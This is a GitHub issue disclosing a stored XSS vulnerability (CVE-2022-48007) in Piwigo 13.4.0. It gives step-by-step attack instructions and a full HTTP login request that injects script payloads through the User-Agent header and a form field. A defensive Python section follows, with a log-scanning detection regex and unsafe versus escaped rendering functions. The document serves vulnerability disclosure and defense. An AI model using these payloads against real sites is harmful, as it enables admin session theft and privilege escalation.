CVE-2022-48007: Piwigo-13.4.0-Stored XSS Vulnerability in User-Agent · Issue #1835 · Piwigo/Piwigo
A stored cross-site scripting (XSS) vulnerability in identification.php of Piwigo v13.4.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the User-Agent.
Hello, I found Stored XSS in Piwigo version 13.4.0.
Impact:
In this way, ordinary users can be promoted to administrator users.
Here are the complete attack steps:
- Register an ordinary user.
- Sign out.
- POST messages with Burp Suite, and change the User-Agent's data to the XSS payload. Here's an example.
POST /src/piwigo/identification.php HTTP/1.1
Host: 192.168.2.153
Content-Length: 98
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.2.153
Content-Type: application/x-www-form-urlencoded
User-Agent: <script>alert(document.cookie);</script> (<svg+onload=alert(1)>) Chrome/108.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.153/src/piwigo/identification.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: phavsz=1445x798x1.25; pwg_id=ocv8aqqvjkdcshuv99j8l3ctub; pwg_tags_per_page=100; pwg_album_manager_view=tile; PHPSESSID=pfjer613d8pnr8ou8uj458i837
Connection: close
username=w1nd&password=123456&remember_me=<svg+onload=alert(1)>&redirect=&login=%E6%8F%90%E4%BA%A4
- Finally, when the administrator user logs in and visits /admin.php?page=user_activity, the stored XSS will be triggered.
/admin.php?page=user_activity
Please fix the vulnerability & let me know :).
Thank You!
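The report above describes the two halves of this bug class: an attacker-controlled header (User-Agent) is stored, and later rendered into an admin page without escaping. The following Python is an added example written for this issue; it is not Piwigo code and not the reporter's. It shows the defensive side: a log scanner that flags requests whose User-Agent carries HTML/JS markup like the payload in the report, and the rendering step done unsafely versus safely. The combined-log sample lines, the function names (`scan_access_log`, `safe_user_agent_cell`, `naive_user_agent_cell`) and the detection regex are all constructed for the example.

```python
import html
import re
from dataclasses import dataclass

# Hypothetical detection rule (not Piwigo code): a User-Agent is plain text, so an
# opening tag, an on*= event-handler attribute or a javascript: URL has no business
# being in it.  Shaped after the payload quoted in the report.
SUSPICIOUS_UA = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*|on[a-z]+\s*=|javascript:", re.IGNORECASE)

# Apache/nginx "combined" access log format:
# ip - - [time] "request" status size "referer" "user-agent"
COMBINED_LOG = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


@dataclass
class Finding:
    line_no: int
    client_ip: str
    user_agent: str
    reason: str


def scan_access_log(lines):
    """Return one Finding per log line whose User-Agent contains markup."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = COMBINED_LOG.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ua = m.group("ua")
        hit = SUSPICIOUS_UA.search(ua)
        if hit:
            findings.append(Finding(n, m.group("ip"), ua, f"markup in User-Agent: {hit.group(0)!r}"))
    return findings


def naive_user_agent_cell(ua):
    """The vulnerable pattern: interpolate the stored header straight into HTML.
    Whatever the client sent becomes part of the admin page's markup."""
    return "<td>" + ua + "</td>"


def safe_user_agent_cell(ua, max_len=200):
    """The fix: truncate (the header is attacker-controlled and unbounded), then
    HTML-escape so '<', '>', '&' and quotes become entities and cannot open a tag
    or attribute.  Escaping belongs at output time, for every sink that shows the value."""
    if len(ua) > max_len:
        ua = ua[:max_len] + "..."
    return "<td>" + html.escape(ua, quote=True) + "</td>"


# Constructed sample log lines.  Line 2 carries the payload from the report
# (the '+' in the original request is a space once the header is logged).
SAMPLE_LOG = [
    '192.168.2.10 - - [10/Jan/2023:10:00:01 +0000] "GET /piwigo/index.php HTTP/1.1" 200 5123 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Chrome/108.0.0.0 Safari/537.36"',
    '192.168.2.20 - - [10/Jan/2023:10:00:07 +0000] "POST /piwigo/identification.php HTTP/1.1" 302 0 '
    '"http://192.168.2.153/piwigo/identification.php" '
    '"<script>alert(document.cookie);</script> (<svg onload=alert(1)>) Chrome/108.0.0.0 Safari/537.36"',
    '192.168.2.30 - - [10/Jan/2023:10:00:09 +0000] "GET /piwigo/admin.php?page=user_activity HTTP/1.1" 200 9000 "-" '
    '"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Firefox/108.0"',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f.line_no} from {f.client_ip}: {f.reason}")
    payload = "<svg onload=alert(1)>"
    print("unsafe:", naive_user_agent_cell(payload))
    print("safe:  ", safe_user_agent_cell(payload))
```

The scanner is useful for the incident-response side of a report like this one: run it over the web server's access log for the period before the admin visited the user activity page to see which account and client address planted the payload. The two rendering functions make the fix concrete: the difference is a single escaping call at the point where the stored header is written into the page.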